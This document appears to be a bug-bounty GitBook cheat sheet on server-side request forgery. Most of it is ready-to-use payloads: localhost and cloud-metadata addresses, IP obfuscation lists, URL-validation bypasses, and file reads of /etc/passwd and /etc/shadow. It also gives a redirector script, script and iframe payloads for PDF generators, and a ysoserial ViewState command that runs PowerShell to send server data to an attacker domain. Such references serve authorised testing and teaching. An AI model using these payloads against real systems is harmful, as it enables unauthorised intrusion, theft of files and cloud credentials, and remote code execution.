SSRF

Server Side Request Forgery: Methodology, payloads, tools

Detection - Vulnerable Parameters

?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}
?show={target}
?navigation={target}
LogoSSRF vulnerabilities and where to find them - Labs DetectifyLabs Detectify
LogoGitHub - MindPatch/lorsrf: Fast CLI tool to find the parameters that can be used to find SSRF or Out-of-band resource load :crab:GitHub

Basic payload

http://127.0.0.1
127.0.0.1:80
127.0.0.1:443
127.0.0.1:22
127.1:80
0
0.0.0.0:80
localhost:80
[::]:80/
[::]:25/ SMTP
[::]:3128/ Squid
[0000::1]:80/
[0:0:0:0:0:ffff:127.0.0.1]/thefile
①②⑦.⓪.⓪.⓪
127.127.127.127
127.0.1.3
127.0.0.0
2130706433/
017700000001
3232235521/
3232235777/
0x7f000001/
0xc0a80014/
{domain}@127
.0.0.1
127.0.0.1#{domain}
{domain}.127.0.0.1
127.0.0.1/{domain}
127.0.0.1/?d={domain}
{domain}@127
.0.0.1
127.0.0.1#{domain}
{domain}.127.0.0.1
127.0.0.1/{domain}
127.0.0.1/?d={domain}
{domain}@localhost

localhost#{domain}
{domain}.localhost
localhost/{domain}
localhost/?d={domain}
127.0.0.1%00{domain}
127.0.0.1?{domain}
127.0.0.1///{domain}
127.0.0.1%00{domain}
127.0.0.1?{domain}
127.0.0.1///{domain}st:+11211aaa
st:00011211aaaa
0/
127.1
127.0.1
1.1.1.1 &@2.2.2.2# @3
.3.3.3/
127.1.1.1:80\\@127
.2.2.2:80/
127.1.1.1:80\\@@127
.2.2.2:80/
127.1.1.1:80:\\@@127
.2.2.2:80/
127.1.1.1:80#\\@127
.2.2.2:80/

Paylod List

Logopayloads/ssrf.txt at main · coffinxp/payloadsGitHub

SSRF to LFI

File Inclusion LFI / RFI
file:/etc/passwd%3F/
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/%3F/../passwd
file:${br}/et${u}c%252Fpas${te}swd%3F/
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/

SSRF POLYGLOT
file:///etc/passwd?/../passwd

Finding SSRF with Burp

Match: https?:\/\/(www\.)?[-a-zA-Z0–9@:%._\+~#=]{1,256}\.[a-zA-Z0–9()]{1,6}\b([-a-zA-Z0–9()@:%_\+.~#?&//=]*)

Replace: https://{YOUR_SERVER}/ (Burp Collaborator)

Source: https://x.com/intigriti/status/1848288871735320916?t=bTTpk3N1LoqLpO1768DhQw&s=03

LogoBug Bounty tip Automating SSRFMedium

Port scan

http://127.0.0.1:§80§

Filter Bypass

LogoURL Format BypassHackTricks

Burp extension

LogoGitHub - hackerassociate/SSRF-Hacks-IP-Decimal: A Burp Suite extension that converts IP addresses to decimal notation, useful for SSRF bypass and WAF evasion testing. Created by Harshad Shah.GitHub

Decimal notation

http://2130706433 equals http://127.0.0.1.
LogoSSRF payloadsMedium

Other notation

127.1 equals 127.0.0.1
LogoGitHub - vysecurity/IPFuscator: IPFuscator - A tool to automatically generate alternative IP representationsGitHub
IPFuscator
Author: Vincent Yiu (@vysecurity)
https://www.github.com/vysec/IPFuscator
Version: 0.1.0

IP Address:     127.0.0.1

Decimal:        2130706433
Hexadecimal:    0x7f000001
Octal:          017700000001

Full Hex:       0x7f.0x0.0x0.0x1
Full Oct:       0177.0.0.01

Random Padding:
Hex:    0x000000000007f.0x000000000000000000000000000000.0x0000.0x0000000000000000000000001
Oct:    00000000000000000000000177.000000000000000000.00000000000000000000000000000.000001

Random base:
#1:     0x7f.0x0.0.01
#2:     0x7f.0x0.0x0.1
#3:     0177.0x0.0x0.0x1
#4:     0x7f.0.0.01
#5:     127.0x0.0.0x1

Random base with random padding:
#1:     127.0x00000000.000000.000000000000000001
#2:     127.0x0000000000000.0x00000000000000000000000000000.0001
#3:     0000000000000000177.0x0000000000000000000000.0x00000000000000000000000000.1
#4:     0000000000000000000177.0.000000.1
#5:     127.0000000000000000000000.0x0000000000000000000.000000000000000000000000000001
LogoGitHub - whiteSHADOW1234/MorphURL: ⚔️ A command-line tool for IP address and URL obfuscation/de-obfuscation, providing diverse techniques for enhanced privacy and security.GitHub
1%32%37.0.0.%31
12%37.%30.%30.%31
%31%327.%30.0.%31
%31%327.%30.%30.1
12%37.0.%30.1
127.%30.%30.%31
1%32%37.0.%30.1
%3127.0.0.%31
%31%32%37.0.%30.%31
1%32%37.%30.0.1
%31%32%37.0.0.%31
%31%32%37.%30.0.%31
%312%37.0.%30.1
%312%37.0.%30.%31
127.0.%30.%31
%31%32%37.0.0.1
1%327.%30.%30.1
%312%37.%30.0.1
%31%32%37.0.%30.1
1%327.%30.0.%31
127.%30.0.%31
%31%327.0.0.%31
127.%30.%30.1
%3127.0.%30.%31
%31%327.%30.%30.%31
1%32%37.%30.%30.1
%3127.%30.%30.1
%31%327.0.%30.1
12%37.%30.0.%31
12%37.%30.%30.1
%312%37.%30.%30.1
1%32%37.0.%30.%31
%31%32%37.%30.0.1
%312%37.0.0.%31
12%37.0.%30.%31
%312%37.%30.0.%31
1%32%37.%30.0.%31
%3127.%30.0.%31
%3127.0.%30.1
%312%37.%30.%30.%31
%31%327.0.%30.%31
1%327.0.%30.%31
1%327.%30.%30.%31

More payload: https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass

IP encoding

Here IP 8.8.4.4 (Google DNS) is used:

8.8.1028 → Partial Decimal (Class B)
Combines the 3rd and 4th octets: 4 × 256 + 4 = 1028

8.525316 → Partial Decimal (Class A)
Combines the last three octets into one decimal number

0x08.8.004.004 → Mixed Encoding
Hexadecimal + Decimal + Octal (segment by segment)

0x08.0x08.004.004 → Double Hex + Octal
Two segments in hex, two in octal

0x08.010.4.4 → Hex + Octal + Decimal Mix

134743044 → Single Decimal
Full 32-bit integer representation of the IP

0x08080404 → Full Hexadecimal IP
Entire IP encoded as a single hex literal

010.010.004.004 → All Octal
Each segment padded with 0 to force octal interpretation

0x8.0x8.0x4.0x4 → Hex per Segment
All four octets encoded individually in hex

8.8.0x404 → Partial Hex (Class B)
Last segment in hex: 0x404 = 1028

Use your own server to redirect on localhost

LogoJust Gopher It: Escalating a Blind SSRF to RCE for $15k — Yahoo MailMedium

redirector.py:

#!/usr/bin/env python3

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv)-1 != 2: 
    print("""
Usage: {} <port_number> <url> 
    """.format(sys.argv[0]))
    sys.exit()
    
class Redirect(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302) 
        self.send_header('Location', sys.argv[2]) 
        self.end_headers() 
    def send_error(self, code, message=None): 
        self.send_response(302) 
        self.send_header('Location', sys.argv[2]) 
        self.end_headers()
HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()

Run redirector server:

python3 redirector.py 80 http://127.0.0.1

Vicitim payload: http://[YOUR_IP]

DNS Rebinding

Logorbndr.us dns rebinding service

Also try 127.0.0.1 and 169.254.169.254

LogoBypassing Filters: SSRF Exploitation via DNS Rebinding with Just 1 in 30 Successful RequestsMedium
LogoUsing Wayback And DNS rebinding For SSRFMedium
LogoServer-side Request Forgery (SSRF) via DNS Rebinding AttackSecureLayer7 - Offensive Security, API Scanner & Attack Surface Management
LogoBypassing Filters: SSRF Exploitation via DNS Rebinding with Just 1 in 30 Successful RequestsMedium

More payloads

Also check Paylaod List

Cloud Metadata IP

169.254.169.254 
169.254.43518 
169.16689662
0xA9.254.0251.0376
LogoNew crazy payloads in the URL Validation Bypass Cheat SheetPortSwigger Research

URL / Host Validation Bypass

FreeDNS - Free subdomain AND domain hosting!
https://assets.example.com.attacker.com/

Replace "{CANARY_TOKEN}" with your controlled hostname and replace "example.com" with a whitelisted target host.

.{CANARY_TOKEN}
@{CANARY_TOKEN}
example.com.{CANARY_TOKEN}
example.com@{CANARY_TOKEN}
example.comx.{CANARY_TOKEN}
{CANARY_TOKEN}#example.com
{CANARY_TOKEN}?example.com
{CANARY_TOKEN}#@example.com
{CANARY_TOKEN}?@example.com
127.0.0.1.nip.io
example.com.127.0.0.1.nip.io
127.1
localhost.me
LogoURL validation bypass cheat sheet for SSRF/CORS/Redirect - 2024 Edition | Web Security AcademyWebSecAcademy

Bypassing protocol whitelists

//{CANARY_TOKEN}
\\{CANARY_TOKEN}
////{CANARY_TOKEN}
\\\\{CANARY_TOKEN}
http:{CANARY_TOKEN}
https:{CANARY_TOKEN}
/%00/{CANARY_TOKEN}
/%0A/{CANARY_TOKEN}
/%OD/{CANARY_TOKEN}
/%09/{CANARY_TOKEN}

URL Schemes

file://, dict://, sftp://, ldap://, tftp://, gopher://

Gopher

LogoHow Gopher works in escalating SSRFsInfoSec Write-ups
LogoGitHub - tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various serversGitHub

Blind SSRF with OOB

LogoGitHub - assetnote/blind-ssrf-chains: An exhaustive list of all the possible ways you can chain your Blind SSRF vulnerabilityGitHub
LogoExploit Blind SSRF with OOB Techniques - TCM SecurityTCM Security - Penetration Testing & Consulting

See Use your own server to redirect on localhost

Platform to receive HTTP & DNS callbacks for SSRF (Blind) - interactsh

LogoGitHub - projectdiscovery/interactsh: An OOB interaction gathering server and client libraryGitHub

SSRF (XSS) in PDF Generator

XSS
LogoPDFReacter SSRF to ROOT Level Local File Read which led to RCEMedium
<iframe src="http://localhost/"></iframe>
<iframe src=file:///etc/passwd></iframe>
"/><iframe src="file:///etc/shadow"></iframe>
<!-- Using XHR -->
<script>var x=new XMLHttpRequest();x.onload=(()=>document.write(this.responseText));x.open('GET','http://127.0.0.1');x.send();</script>

<!-- Using Fetch -->
<script>fetch('http://127.0.0.1').then(async r=>document.write(await r.text()))</script>

<!-- Using embed -->
<embed src="http://127.0.0.1" />

<!-- Using base HTML tag -->
<base href="http://127.0.0.1" />

<!-- Loading external stylesheet/script -->
<link rel="stylesheet" src="http://127.0.0.1" />
<script src="http://127.0.0.1"></script>

<!-- Meta-tag to auto-refresh page -->
<meta http-equiv="refresh" content="0; url=http://127.0.0.1/" />

<!-- Loading external image -->
<img src="http://127.0.0.1" />

<!-- Loading external SVG -->
<svg src="http://127.0.0.1" />

<!-- Useful to bypass blacklists -->
<input type="image" src="http://127.0.0.1" />
<video src="http://127.0.0.1" />
<audio src="http://127.0.0.1" />
<audio><source src="http://127.0.0.1"/></audio>
<script>
  var x = new XMLHttpRequest();
  x.onload=function(){ document.write(this.responseText) };
  x.open('GET','http://127.0.0.1'); // You can also read local system files such as "/etc/passwd"
  x.send();
</script>
<script>
  var x = new XMLHttpRequest();
  x.onload=function(){ document.write(this.responseText) };
  x.open("GET","file:///etc/passwd"); x.send();
</script>

Some PDF generators rely on the Chromium web browser without sandbox security enabled and with root privileges. This can often be further escalated to remote code execution!

LogoHunting for SSRF Bugs in PDF Generators  - Black Hills Information SecurityBlack Hills Information Security
LogoExploiting SSRF in PDF HTML Injection: Basic and BlindInfoSec Write-ups
LogoExploiting PDF generators: A complete guide to finding SSRF vulnerabilities in PDF generatorsIntigriti

PDF Generator - SSRF in .NET Application to RCE

LogoHow SSRF Leads to RCE in a .NET ApplicationMedium
<html>
<script>
    window.location='file:///C:/Windows/System32/drivers/etc/hosts'
</script>
</html>

Look for encryption keys in web.config

Craft a ViewState payload that executed a PowerShell command to exfiltrate server information

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe -Command \"$w=(whoami); Invoke-WebRequest -Uri http://<attackerdomain>/aaaa?data=$w -UseBasicParsing\"" --path="<path>.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="<decrypt-key>" --validationalg="SHA1" --validationkey="<key>"

NextJS apps

CVE-2024-34351 - fixed in v14.1.1.

https://example.com/_next/image?url=https://localhost:2345/api/v1/x&w=256&q=75
https://example.com/_next/image?url=https://third-party.com/logout%3furl%3Dhttps%3A%2F%2Flocalhost%3A2345%2Fapi%2Fv1%2Fx&w=256&q=75
LogoDigging for SSRF in NextJS apps

Tools

SSRFmap

LogoGitHub - swisskyrepo/SSRFmap: Automatic SSRF fuzzer and exploitation toolGitHub

Autossrf

LogoGitHub - Th0h0/autossrf: Smart context-based SSRF vulnerability scanner.GitHub

0dSSRF

LogoGitHub - KariiemGamal/0dSSRF: a powerful tool designed to automate the detection of Server-Side Request Forgery (SSRF) and Open Redirect vulnerabilitiesGitHub

SSRFPwned

LogoGitHub - blackhatethicalhacking/SSRFPwned: Checks for SSRF using built-in custom Payloads after fetching URLs from Multiple Passive Sources & applying complex patterns aimed at SSRFGitHub

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

Resources

LogoBug-Bounty-Methodology/Server Side Request Forgery.md at main · trilokdhaked/Bug-Bounty-MethodologyGitHub
LogoSSRF: A complete guide to exploiting advanced SSRF vulnerabilitiesIntigriti
LogoHow To: Server-Side Request Forgery (SSRF)HackerOne
LogoSSRF Cheat Sheet & Bypass Techniques
LogoA10 Falsification de requête côté serveur (SSRF) - OWASP Top 10:2021
LogoWhat is SSRF (Server-side request forgery)? Tutorial & Examples | Web Security AcademyWebSecAcademy
LogoServer-Side Request Forgery (SSRF) | Common Attacks & Risks | ImpervaLearning Center
LogoServer Side Request Forgery Prevention - OWASP Cheat Sheet Series
LogoServer-Side Request Forgery (SSRF)Intigriti
LogoI Studied 100+ SSRF Reports, and Here’s What I LearnedInfoSec Write-ups
PreviousCSTINextCSRF

Last updated